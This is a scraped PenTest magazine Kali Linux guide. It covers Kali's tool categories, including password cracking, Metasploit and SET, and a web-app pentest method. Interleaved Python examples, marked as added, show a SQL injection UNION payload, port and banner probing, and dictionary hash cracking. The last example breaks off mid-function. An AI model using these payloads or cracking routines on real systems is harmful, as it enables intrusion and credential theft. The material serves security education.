PenTest Extra 03 2014 Teaser1

December 21, 2016 | Author: claudiu | Category: N/A



Cyber Security Auditing Software

Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process.

Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device against that policy and then create a report detailing the issues identified. The reports can include device-specific mitigation actions and can be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself? Evaluate for free at titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems. www.titania.com

KALI LINUX THE ULTIMATE GUIDE Copyright © 2014 Hakin9 Media Sp. z o.o. SK

Table of Contents

What is Kali? .... 8
Comparison Of Kali Linux And Previous Backtrack Versions .... 19
Top 5 Kali Linux Tools You Absolutely Must Use .... 34
Kali Linux .... 41
The Ultimate Installation Guide for Kali Linux .... 55
The Password Attacks .... 70
Pentesting Wireless with Kali Linux .... 81
Kali Linux on a Raspberry Pi .... 85
In Depth Review of the Kali Linux: A Hacker's Bliss .... 88
Kali Linux – The BackTrack Successor .... 95
Kali Linux WiFi Testing .... 105
Web Applications with Kali Linux .... 118
Penetration Testing with Linux .... 134
Bypassing new generation Firewalls with Meterpreter and SSH Tunnels .... 142
The Top 10 Kali Linux Security Tools .... 153
Interview with Demóstenes Zegarra Rodríguez .... 176
Case Study: Analysis of Security and Penetration Tests for Wireless Networks with Kali Linux .... 179
Mapping Kali Usage to NIST800-115 .... 182
Interview with Jeff Weekes .... 195
How to Install Kali Linux .... 199
How to Login as a User in Kali linux .... 215
How to Add or Create a New User in Kali Linux .... 216
How to Change Host Name in Kali Linux .... 218
How to Create an Instant Chat Session with ncat Between Kali and BackTrack .... 222
How to Remove Users in Kali Linux .... 224
How to Delete Users in Kali Linux .... 225
How to Extract a RAR File .... 226
How to Use Dnmap in Kali Linux .... 228
How to Find Files in Kali Linux .... 236
How to Use Detect_sniffer6 .... 238
How to Use DNSenum in Kali Linux .... 241
How to Use Dnsdict6 and Get the IPv6/IPv4 Address of a Domain .... 245
How to Use Dnsmap in Kali Linux .... 248
How to Use DNSRecon in Kali Linux .... 253
How to Use DNSRevenum6 .... 258
How to Use Dnstracer .... 260
How to use Dnswalk .... 265
How to Use Hping3 .... 270
How to Use Fcrackzip in Kali Linux .... 272
How to Use Fierce .... 276
How to Use Fping .... 279
How to Use Arping in Kali Linux .... 282
How to Use Hash-identifier .... 284
How to Use Jigsaw .... 287
How to Use Joomscan .... 291
How to Use Nbtscan .... 294
How to Use Ncat .... 297
How to Use Dmitry in Kali Linux .... 302
How to Create Bootable Kali Linux USB .... 310
How to Gain Access to Windows XP/Linux by ncat .... 321
How to Install DVWA on Kali Linux .... 325
How to Install Flash Player in Kali Linux .... 332
How to Use Arachni_web in Kali Linux .... 334



Dear PenTest Readers,

We are happy to bring to you the Ultimate Kali Compendium. This issue is a collection of our previous Kali Linux issues: Kali Linux, Kali Linux 2, and Kali Tutorial. Now, all the knowledge from these three magazines we have decided to put into one.

You will encounter simple articles like an overview of Kali, installation guide, and its comparison to previous BackTrack versions, as well as advanced ones, such as Wi-Fi testing or bypassing new generation firewalls with Meterpreter and SSH tunnels. Also, you will be able to read a few fascinating interviews with Dan Dieterle, Demóstenes Zegarra Rodriguez, and Jeff Weekes. You will also get to know about almost every tool available in the OS, their advantages and disadvantages, as well as how to use them and for what. We sincerely hope that this compendium will achieve its goal, which is if you have a problem in Kali, you can find the solution in one place - the Ultimate Kali Compendium. Enjoy the issue and improve your pentesting knowledge.

The PenTest Team


Editor in Chief: Ewa Duranc
Managing Editor: Milena Bobrowska
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Rodrigo Comegno, David Jardin, Varun Nair, Greg Rossel, John Webb, Laszlo Acs, Abhiraj, Gilles Lami, José Luis Herrera, Ivan Gutierrez Agramont, Phil Patrick, Dallas Moore, Marouan Bellioum, Alexander Groisman, Mbella Ekoume, Arnoud Tijssen, Abhishek Koserwal
Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic

[ GEEKED AT BIRTH ]

Production Director: Andrzej Kuca
Art Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media SK, 02-676 Warsaw, Poland, Postepu 17D
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

You can talk the talk. Can you walk the walk?

[ IT’S IN YOUR DNA ] LEARN: Advancing Computer Science Artificial Life Programming Digital Media Digital Video Enterprise Software Development Game Art and Animation Game Design Game Programming Human-Computer Interaction Network Engineering Network Security Open Source Technologies Robotics and Embedded Systems Serious Game and Simulation Strategic Technology Development Technology Forensics Technology Product Design Technology Studies Virtual Modeling and Design Web and Social Media Technologies

www.uat.edu > 877.UAT.GEEK Please see www.uat.edu/fastfacts for the latest information about degree program performance, placement and costs.


What is Kali?
by Albert López (newlog)

It is a fact that in recent years the BackTrack distribution has been the one most used by security professionals and enthusiasts. Its path started in 2006, and for seven years it was improved while earning its place in the security community. Nowadays it is hard to find anyone interested in computer security who has not heard of BackTrack. In March 2013 the Offensive Security people went one step further and published the definitive BackTrack evolution. Its name: Kali. Coming from a team called Offensive Security, even if they deny it, what an appropriate name Kali is! The Hindu goddess of time, change and destruction, or perhaps after the Filipino martial art... Pretty offensive, isn't it? Leaving aside its name, we can assure you that Kali is a powerful tool that any security professional can use for free.

The Good and The Bad

Trying to list the possible drawbacks of Kali is a hard task, so we will start by enumerating several of its advantages. Talking about Kali's advantages means talking about the changes between BackTrack and Kali. We will assume that the reader already knows what BackTrack is and what its capabilities are. Briefly, for those who do not know anything about it, BackTrack is a Linux distribution, based on Ubuntu, with plenty of security tools cleverly classified and ready to use. So why did BackTrack have to evolve into Kali? These are some of the changes in Kali and, therefore, some of its advantages.

Kali is based on Debian

This brings many advantages. The first is that the Kali repositories are synchronized with the Debian repositories, so you can easily obtain security patches and package updates; keeping your pentesting system up to date is essential. Another advantage is that every tool in Kali is packaged according to the Debian packaging policy. This may seem trivial, but it gives the overall system structure and tools more robustness and clarity, and it gives you an easy way to obtain the tools' source code (for example with apt-get source) to review or modify it.

Architecture compatibility

A key feature of Kali is its improved ARM support. Since Kali appeared, many impressive builds have been created. What do you think about running Kali on a Raspberry Pi or on a Samsung Galaxy Note? Pretty amazing, don't you think?

Advanced wireless support

One of the focuses of the Kali developers has been to support a broad range of wireless devices, whether internal hardware or USB dongles. This effort goes together with a custom patched kernel that includes the latest patches for packet injection through wireless interfaces, a basic requirement when a security professional has to perform a wireless assessment.



Full customization

Kali is very flexible when it comes to the visual interface and system customization. As for the interface, the user can now choose among several desktops such as GNOME, KDE or Xfce. Regarding system customization, you can now easily create fully customized ISO images thanks to the Debian live-build scripts.

Business aware

All the Kali customizations and the Debian features mentioned above give companies the ability to deploy Kali on multiple systems and to perform network installs of Kali from local or remote repositories.

Easy upgrades between versions

This is a key feature for every system administrator who has to maintain Kali systems or, in fact, for anyone using Kali. With BackTrack, every new release required a complete reinstall of the system. Now, thanks to the move to Debian, Kali offers an easy way to upgrade your system in place when new versions come out.

Great documentation

Another important point is that with Kali you have a lot of online documentation to guide you in all your tasks.

As you can see, Kali is not only a new version of BackTrack but a whole new infrastructure, and with this effort a lot of new and powerful features have arrived. Regarding the disadvantages, it is embarrassing to say that the writer has not found any relevant drawback to using Kali for security assessments. As to the system architecture, the migration to Debian has brought a lot of powerful features. This, combined with all the provided tools and the Kali developers' commitment to maintain them and ship updates as soon as possible, makes Kali the best choice for anyone looking for a security distribution.

Included Tools

Kali puts more than 200 tools at your disposal. If these tools were not well organized and classified, the usability of the penetration testing framework would not be very good. But as with BackTrack, all the tools are consistently classified by category. We will now explain what each category is and what its most representative tools are.



Figure 1. Classification of tools

The first category is Information Gathering. This category groups the tools focused on obtaining information about the target. There is a huge number of tools in this category, divided by the kind of reconnaissance they perform: OS fingerprinting, network scanners, SSL analysis, VoIP analysis and many more. Among all these tools we can highlight the old, well-known Nmap, a really powerful network scanner. Besides telling you which ports are open, filtered or closed, Nmap can identify the services behind them and perform operating system detection. Furthermore, recent versions let you write your own scripts, which are run through the Nmap Scripting Engine (NSE). As of today, the official Nmap site offers more than 400 scripts, giving Nmap more power than ever. Another tool worth mentioning is theHarvester. It queries many search engines, such as Google, Google Profiles, Bing, LinkedIn or Shodan, to find information about, for example, a company: email addresses, host names and much more.

The next category is Vulnerability Analysis. This one is focused on discovering vulnerabilities, so here you have tools such as vulnerability scanners and fuzzers. In this category you can find sqlmap, a great tool that really helps you find and exploit SQL injection vulnerabilities. You specify the web application and the parameters you want to check and it sends a huge battery of tests. It eases the repetitive task of trying all the payloads for a large number of database engines. Another important tool is OpenVAS, a complete framework focused on vulnerability discovery. It was born as a fork of Nessus when Nessus became closed source.
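The battery-of-payloads approach that sqlmap automates, as an added example that is not part of the article or of sqlmap itself: a hypothetical lookup handler that pastes its parameter into SQL, run against an in-memory SQLite table with constructed rows, a boolean-based probe that detects the injection by comparing responses to an always-true and an always-false condition (a database error on a stray quote is the error-based signal), and the parameterized version of the same handler that the probe no longer flags. The table, the handler names and the payloads are all assumptions made for this example.

```python
import sqlite3

# Constructed sample data for the example: a tiny catalogue with one non-public row.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT, public INTEGER)")
conn.executemany(
    "INSERT INTO products VALUES (?, ?, ?)",
    [(1, "widget", 1), (2, "gadget", 1), (3, "secret-prototype", 0)],
)


def vulnerable_lookup(product_id):
    """Hypothetical handler for ?id=...: the parameter is pasted into the SQL."""
    sql = "SELECT name FROM products WHERE public = 1 AND id = " + product_id
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(product_id):
    """Same lookup with a bound parameter; the value is data, never SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        return []
    rows = conn.execute(
        "SELECT name FROM products WHERE public = 1 AND id = ?", (pid,)
    )
    return [row[0] for row in rows]


def probe(handler, value):
    """Call the handler and normalise the outcome so responses can be compared.
    A database error is itself a signal (error-based detection)."""
    try:
        return ("ok", tuple(handler(value)))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def is_boolean_injectable(handler, value="1"):
    """Boolean-based check: an always-true condition must leave the response
    unchanged and an always-false one must change it. Requiring both rules
    out a handler that merely ignores or rejects the extra text."""
    baseline = probe(handler, value)
    with_true = probe(handler, f"{value} AND 1=1")
    with_false = probe(handler, f"{value} AND 1=2")
    return baseline == with_true and baseline != with_false


def dump_hidden_rows(handler):
    """Once injection is confirmed, a UNION reads the rows the WHERE clause hid."""
    return handler("1 UNION ALL SELECT name FROM products WHERE public = 0")


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        print(name, "injectable:", is_boolean_injectable(handler))
        print(name, "stray quote:", probe(handler, "1'"))
        print(name, "union dump:", dump_hidden_rows(handler))
```

Against a real application the handler would be an HTTP request and the comparison would be made on status code and body after stripping the noise (timestamps, CSRF tokens, view-state) that changes between otherwise identical responses; that noise filtering is most of what separates a quick script like this from sqlmap.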
In the Web Applications category you can find tools that identify web applications and their vulnerabilities. To this end you have at your disposal tools such as Burp Suite. One of the main, basic features of Burp is its ability to intercept all the requests sent to web applications so you can modify and resend them. But Burp is not only an intercepting proxy; it is one of the best tools for performing web application analyses, whether automatic or manual. For example, with Burp you can load many payloads from a file and substitute them into the parameters sent to the web application. This lets you perform brute force attacks against authentication forms, or load customized payloads to find SQL injection or cross-site scripting vectors. Its UI is pretty intuitive, so any user will quickly become familiar with all its features. You also have tools such as XSSer which, in a similar way to sqlmap, launches a bunch of payloads to find cross-site scripting vulnerabilities.

Then you have the Password Attacks category. This category is quite self-explanatory: you can find tools that crack passwords offline or launch attacks against online services. Notable tools are John the Ripper, oclHashcat-plus, Medusa and THC-Hydra. The first is an old but well maintained password cracker. One of the main features of the second is that it uses the power of GPUs to attack password hashes, and with Medusa and THC-Hydra you can launch brute force attacks against online services. THC-Hydra made a clear statement of intent (http://www.thc.org/thchydra/network_password_cracker_comparison.html) by comparing its features against other tools such as Medusa, and in that comparison THC-Hydra is clearly the winner.

The next category is Wireless Attacks. Here you can find tools to analyze and attack wireless protocols such as IEEE 802.11, RFID/NFC or Bluetooth. The quintessential tool for analyzing IEEE 802.11 (WiFi) is aircrack-ng, a complete suite that lets you perform many attacks against the different authentication and encryption mechanisms of WiFi networks.

In the Exploitation Tools category you can find tools designed to attack different kinds of systems, or to attack systems in different ways.
One of the best tools we have nowadays for exploiting the vulnerabilities present in a system is Metasploit. Metasploit is a complete framework with a huge number of exploits ready to be launched against the target. It is, more or less, a point-and-shoot tool that gives you everything pre-built, so you do not have to worry about the technicalities of the vulnerability being exploited. You also have another interesting tool, SET, the Social-Engineer Toolkit, another framework that helps you take control of systems, but using social engineering to achieve your goal. For example, with this tool you can easily build phishing web sites to deceive users into installing malicious software, such as PDF files with embedded malware, which SET also generates for you.

The Sniffing/Spoofing category holds the tools used to intercept network, web or VoIP traffic. One of the best sniffers out there is Wireshark. With Wireshark you can capture network traffic and the tool will, where possible, identify the protocol used and highlight the important data. You can also apply advanced filters to the captured data, either after capture or while it is being captured. Another interesting tool is dsniff, a suite of small programs that let you intercept and identify interesting data such as passwords and e-mails, or sniff SSL-protected data by exploiting weak configurations.

The following category is Maintaining Access. It unifies the tools that help you keep access to the target and get at the critical information stored on it. For example, you have many operating system and web backdoors, as well as tools to encapsulate outgoing traffic in protocols that are not normally filtered. You also have another old, well-known tool: netcat (or ncat, the Nmap project's reimplementation). Netcat is a really flexible tool for client-server communication. It is a basic tool that, depending on your imagination, can become something you use every day for many different things, such as quickly retrieving HTTP banners or transferring files from one machine to another.
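The banner grabbing netcat is used for, together with the open/closed/filtered classification that Nmap reports, as an added example that is not part of the article or of either tool: a TCP connect probe in Python, exercised against a throwaway one-shot listener on loopback so it runs offline. The ports and the SSH and HTTP banners are constructed for the example; a real scan would target the remote host instead of 127.0.0.1.

```python
import socket
import threading


def serve_banner(banner, expects_request=False):
    """Constructed stand-in for a real service: accept one connection on a
    random loopback port, send the banner and close. Returns the port.
    With expects_request=True it behaves like HTTP and waits for the client
    to speak first; otherwise it speaks first like SSH or SMTP."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def one_shot():
        conn, _ = srv.accept()
        with conn:
            if expects_request:
                conn.recv(1024)
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=one_shot, daemon=True).start()
    return port


def unused_port():
    """Bind and release a port so the probe sees a closed port (RST back)."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def probe(host, port, request=b"", timeout=1.0):
    """Connect scan of one port: returns (state, banner).
    'closed'   -> the host answered with RST (nothing is listening)
    'filtered' -> no answer before the timeout (dropped by a firewall)
    'open'     -> handshake completed; banner is whatever the service sent.
    Protocols like HTTP only answer after the client talks, so an optional
    request is sent first (what piping a HEAD request into nc does)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except ConnectionRefusedError:
        sock.close()
        return "closed", b""
    except (socket.timeout, OSError):
        sock.close()
        return "filtered", b""
    try:
        if request:
            sock.sendall(request)
        banner = sock.recv(512)
    except socket.timeout:
        banner = b""  # open but silent: the service wants the client to speak first
    finally:
        sock.close()
    return "open", banner


if __name__ == "__main__":
    ssh = serve_banner(b"SSH-2.0-OpenSSH_6.0p1 Debian-4\r\n")
    http = serve_banner(b"HTTP/1.0 200 OK\r\nServer: Apache/2.2.22 (Debian)\r\n\r\n",
                        expects_request=True)
    print(probe("127.0.0.1", ssh))
    print(probe("127.0.0.1", http, request=b"HEAD / HTTP/1.0\r\n\r\n"))
    print(probe("127.0.0.1", unused_port()))
```

The "filtered" branch cannot be shown on loopback; on a real network it is the case where a firewall silently drops the SYN, which is exactly why Nmap distinguishes it from "closed" (where an RST proves the host is alive and nothing listens there).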
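Returning to the Password Attacks category above: an added example, not from the article nor from John the Ripper, hashcat or hash-identifier, of what an offline dictionary attack actually does. It guesses the algorithm from the digest length the way hash-identifier does (note the real ambiguity: a 32-hex-character digest can be MD5 or NTLM, among others), applies a few mangling rules of the kind John's rule engine uses, and compares each candidate with a constant-time comparison. The wordlist, the salt and the "captured" hashes are constructed for the example; the two unsalted digests are the standard MD5 of "password" and SHA-256 of "admin", and the other two are computed in the block.

```python
import hashlib
import hmac

# Digest length in hex characters -> candidate algorithms. Real identifiers
# carry many more entries; 32 chars is genuinely ambiguous (MD5, NTLM, ...).
CANDIDATES_BY_LENGTH = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}

# Constructed wordlist for the example (a real run would use rockyou.txt or similar).
WORDLIST = ["letmein", "admin", "password", "summer"]


def identify(digest_hex):
    """Return the candidate algorithms for a hex digest ([] if it is not one)."""
    h = digest_hex.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return CANDIDATES_BY_LENGTH.get(len(h), [])


def mangle(word):
    """A few of the rules crackers apply to every dictionary word."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2014"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack(digest_hex, wordlist, salt="", rules=True):
    """Offline dictionary attack: hash every candidate with every plausible
    algorithm and compare. Returns (algorithm, plaintext) or None."""
    target = digest_hex.strip().lower()
    for algo in identify(target):
        for word in wordlist:
            for candidate in (mangle(word) if rules else (word,)):
                digest = hashlib.new(algo, (salt + candidate).encode()).hexdigest()
                if hmac.compare_digest(digest, target):
                    return algo, candidate
    return None


# Constructed "captured" hashes: two well-known unsalted digests plus two
# computed here so the rule-based and salted cases can be shown offline.
CAPTURED = {
    "md5_password": "5f4dcc3b5aa765d61d8327deb882cf99",
    "sha256_admin": "8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918",
    "sha1_summer2014": hashlib.sha1(b"Summer2014").hexdigest(),
    "sha1_salted_letmein": hashlib.sha1(b"s4lt" + b"letmein").hexdigest(),
}

if __name__ == "__main__":
    for label, digest in CAPTURED.items():
        salt = "s4lt" if "salted" in label else ""
        print(label, identify(digest), crack(digest, WORDLIST, salt=salt))
```

Two things the run makes visible: a salt does not slow the attack once it is known (it only defeats precomputed tables), and every candidate costs one cheap hash, which is why a GPU cracker like oclHashcat-plus gets billions of MD5 or SHA-1 guesses per second while a deliberately slow scheme such as bcrypt, scrypt or PBKDF2 with a high iteration count is the only thing that really raises the attacker's bill.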



Figure 2. Netcat tool

The Reverse Engineering section unifies the tools with which you can debug or disassemble binaries. To debug binaries you have OllyDbg or edb-debugger. The first is a quite powerful debugger, but it has to be run through Wine, since it is only available for Microsoft Windows. For this reason you also have edb-debugger which, despite being quite new, is already useful. Then you have a complete reverse engineering framework, radare2 (r2). This is the Swiss army knife of every reverse engineer who works on a Unix workstation. Radare2 is not an easy tool to use; it has a steep learning curve, but once you get it, it becomes a really powerful tool. The radare2 framework is made up of many small tools such as r2, rabin2, rasm2 or rax2, each of which lets you do many different things. For example, with radare2 you can inspect shellcode, reverse engineer binaries in different formats such as PE, ELF, Mach-O and DEX or Java classes, analyze disk images for forensic purposes, find gadgets to build your ROP (Return Oriented Programming) payload, debug binaries, find differences between binaries (bindiffing) or patch binaries. All this can be extended with plugins that you can write in Python, Go, Perl, JavaScript, etc.

In the Stress Testing section you can find tools to check the capacity of your network, web application, WLAN or VoIP service to handle huge amounts of traffic. For example, with these tools you can simulate denial of service attacks.

With the tools in the Hardware Hacking category you can program sketches for Arduino devices, and you will also find tools to develop for Android, with the Android SDK, and to analyze Android applications with tools such as APKTool and dex2jar.

In Kali, the Forensics category is amazing. There you have plenty of tools focused on several forensic fields.
For example, you can find tools for network forensics, PDF forensics, RAM forensics and much more. One tool that is hitting hard these days is Volatility. This tool is used to analyze data stored in RAM: you give Volatility a memory image taken at a given point in time and it extracts a lot of interesting information for you. For example, you can list the processes that were running at that moment, open sockets and network connections, LM/NTLM hashes and LSA secrets, and a lot of other information. If you want to start playing with it, the Volatility people provide (http://code.google.com/p/volatility/wiki/PublicMemoryImages) many memory images with interesting data for you to extract.

Finally, you have the last two categories, Reporting Tools and System Services. In the Reporting Tools section, as its name suggests, you can find tools to help you report all the vulnerabilities you have found. For example, you have recordmydesktop, which is simply a tool for recording videos of your activity on your computer. Another important tool is TrueCrypt. Even though it is not directly related to the documentation task, as a security professional you always have to be really careful about where you store the results of your work. TrueCrypt gives you the possibility of storing your pentesting results encrypted so nobody but you can read them. (Note that TrueCrypt's developers discontinued it in May 2014; on a current Kali you should use a maintained alternative such as LUKS via cryptsetup.) In the System Services category you have different services you can launch to help with your tasks. For example, you can start an Apache HTTP server or a MySQL server.

As you have seen, Kali has everything a pentester might need. And thanks to its flexibility, if the tool you need is not in your arsenal, you can still easily install it in your distribution.

Web application pentesting process

A penetration test is usually divided into two kinds of tasks: those that are automatic and those that are manual. The manual tasks are the ones that add value to your reports as a pentester, and they are guided by your experience and intuition. These manual tasks are what will make your report something remarkable or, conversely, something that looks factory-made. If you do not work hard on these manual tasks you will end up with a report that anyone could produce, given that all your findings will have been discovered by automatic tools and, therefore, anyone clicking a button would get the same results.

Another important issue for a pentester is the time factor. When you are hired to perform a penetration test your time will be limited and, normally, the final outcome of the analysis will be directly related to the time available to carry it out. Thus, it is very important to be organized and to have some kind of methodology. In this chapter we will explain many steps for carrying out a penetration test of a web application, but we will assume that you work alone. If you were part of a team, the methodology explained here would not be enough: we will not take into account the way you would communicate with the team in order to share your results so they could use them in their tasks.

In this chapter we will not cover in depth what kinds of vulnerabilities you should search for. Instead we will explain a methodical way that will allow you to easily find them once you know what to look for. If you are carrying out a complete penetration test against, for example, the network of a company, we suggest you follow the OSSTMM (http://www.isecom.org/research/osstmm.html) (Open Source Security Testing Methodology Manual). This is an open methodology, so you do not have to pay in order to get and follow it.
This methodology, broadly speaking, is a guide about when and which elements should be tested during a penetration test. For web application security, if you want something more specific that also tells you what kinds of vulnerabilities you have to look for and what those vulnerabilities are, we highly recommend reading the "OWASP Testing Guide" (https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents). In its own words, OWASP (Open Web Application Security Project) is "an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted". To accomplish this, OWASP has developed many different methodologies for many different problems, such as pentesting web applications, reviewing source code, and so on. The OWASP Testing Guide is a great resource for learning what you should look for when conducting a web application penetration test. It explains all the kinds of vulnerabilities you may find, what they are and how you can find them. Of course, the explanations are not in depth, but once you have read it you will have a good starting point from which to search for more information about the vulnerabilities and how to exploit them.

OK then. Now that the concepts are clear, let's get to the process. As we said, the manual tasks in a penetration test are the key to a good outcome, but given that we have limited time we will need to rely somewhat on automatic tools that work in the background while we manually check our target. So the first step is to prepare the tools that will perform automatic scans. Here you have many possibilities; some of them are in the Kali distribution and some are not. If you are a security professional, meaning that you earn money from your work, we would advise you to buy one or more automatic scanners.
Here we list some tools that can get the work done for a reasonable price. It’s worth noting that the tools listed below are more focused on system vulnerabilities, but they can also detect web vulnerabilities.

• Nessus Vulnerability Scanner
• QualysGuard

KALI LINUX THE ULTIMATE GUIDE

Nessus is a tool that you will have to install on your local machine. QualysGuard, on the contrary, is a cloud service. In our experience, QualysGuard does a pretty good job and, compared with Nessus, QualysGuard probably gives fewer false positives. Both tools can produce reports as XML files so you can easily integrate their results into your reports. What we strongly advise is that you install more than one automatic scanner so you can compare their results, and, what is of critical importance, you must always verify the vulnerabilities they report! If you don’t have the resources or don’t really want to buy any tool, you can always use w3af or the new tool Arachni Web Scanner from your Kali distribution to perform web application scans. W3af is a great tool and it’s already a pretty mature project. Now that you have launched your automatic web scanners (hopefully from a different machine, so we have plenty of memory and CPU resources), we can start the manual part. The following steps are completely related to a web application penetration test. Nowadays, web applications are a critical component in the business model of enterprises. The fact that a lot of web applications are specifically developed from scratch to fulfill the company’s needs, and that web vulnerabilities are easier to exploit than system vulnerabilities, means that attackers focus their efforts on exploiting them. This means that as pentesters we should also focus our efforts on securing them. The first step we should take would be to launch Burp Suite. With Burp Suite you will configure a localhost proxy in your browser so all the requests go through Burp. Then you configure the scope in Burp’s settings so you only log those requests whose destination address is your target. This way you will prevent a lot of junk requests from showing up.

Figure 3. Requests

The next step would be to navigate through the entire target website while watching the request history page in Burp. This way, once you find an interesting web page in your target, you will know which request and response have been sent and received, and you will be able to highlight or even comment on it in Burp. Let’s define what may be interesting.

• Requests with GET parameters
• Requests with POST parameters
• Requests setting cookies (Set-Cookie header)
• And everything your intuition tells you might be important

You will end up with something similar to the next image: Figure 3.

At this point you will have visited the entire web site and will have an idea of where the critical sections are. The third step would be to analyze all (or the most important) requests that might be important. Now is when your experience comes into play. You will have to apply all your knowledge to identify all kinds of vulnerabilities. For example, if you are in front of a request that sends POST parameters, those parameters will probably be used in a database query, so you will have to try different things to check whether a SQL injection vulnerability exists. If you are certain that those parameters hit a database, or might be vulnerable to cross-site scripting, you might want to combine your personal skills with the aid that tools such as Sqlmap or XSSer can provide. This way you will have all the tedious work done by automatic tools and you will be able to carry out the genius work. You should proceed this way until you have checked all the important requests. The next step would be to identify software weaknesses. Nowadays the use of a CMS is very widespread, so tools that help you identify whether a CMS is being used will help. You can use, for example, WPScan if you think the CMS in use is WordPress. This tool will help you identify the version of WordPress used and whether it has any plugins installed, so you can check if the WordPress or plugin versions in use are outdated and, consequently, have published vulnerabilities. Finally, you will try to find configuration weaknesses. Here you should look for things such as outdated server software in use, bad SSL configurations, etc.
With Qualys SSLLabs you will be able to obtain a colour-coded chart showing you the strengths and weaknesses of the target website’s SSL certificates, as shown in the next image: Figure 4.

Figure 4. The strengths and weaknesses of the target website SSL certificates

As you can see in the first image, the target website has an SSL certificate that does not have the correct domain associated with it. And in the second image you can see an overall score generated by SSLLabs that shows that the ciphers supported by the certificate in use are vulnerable to known weaknesses. Needless to say, the same checks that SSLLabs carries out can be programmed by you in your own scripts, so you don’t have to depend on external services. On the other hand, one good approach to checking server technologies is to check the HTTP headers. This can be done in different ways (for example, you could use Burp), but given that it is something really easy to check, it is as simple as sending a GET request with netcat, as shown in the following image:

Figure 5. GET request

As you can see, we can obtain some valuable information, such as that they are using the Apache web server (although the Apache version is hidden) and, thanks to the X-Powered-By header (which should have been removed), we can infer that they are using Parallels Plesk Panel. Then we can try to find published exploits for that software. If that was not enough, sending a malformed request (without the Host header) using the HTTP/1.1 protocol will generate an error that will give you information about the hosting service in use. Look at the following image:

Figure 6. An error generated

From the response of the server, you can infer that the website is hosted by (or has something to do with) the pracait.com service. Once you have finished all the manual review of the web application, it will be time to merge the results you have found with the results the automatic scanners have found. Explaining how a good-looking report should be written would be a subject for another full article, so for now we will leave it out of scope. Following all these steps you will be able to carry out a good penetration test. Of course, the results obtained will depend on your experience and the time you have to perform the task.
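The header check and the Host-less HTTP/1.1 probe described above, as an added Python example that is not the article’s code: build_request(), parse_response() and audit_headers() are assumed names, and the sample response is constructed to match what the article describes (Apache with its version hidden and an X-Powered-By header left in place).

```python
"""Check what a web server discloses in its response headers.

Added example (not the article's code). It does in a script what the
article does with netcat: send one raw GET request, optionally without
the Host header, and report the headers that reveal the server stack.
"""
import socket

# Response headers that commonly reveal the technology stack (constructed list).
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")


def build_request(path="/", host=None, version="1.1"):
    """Build a raw HTTP request string.

    host=None deliberately omits the Host header. That is the malformed
    HTTP/1.1 request the article describes: a conforming server answers
    it with 400 Bad Request, and the error page is what leaks details.
    """
    lines = [f"GET {path} HTTP/{version}"]
    if host is not None:
        lines.append(f"Host: {host}")
    lines.append("Connection: close")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_response(raw):
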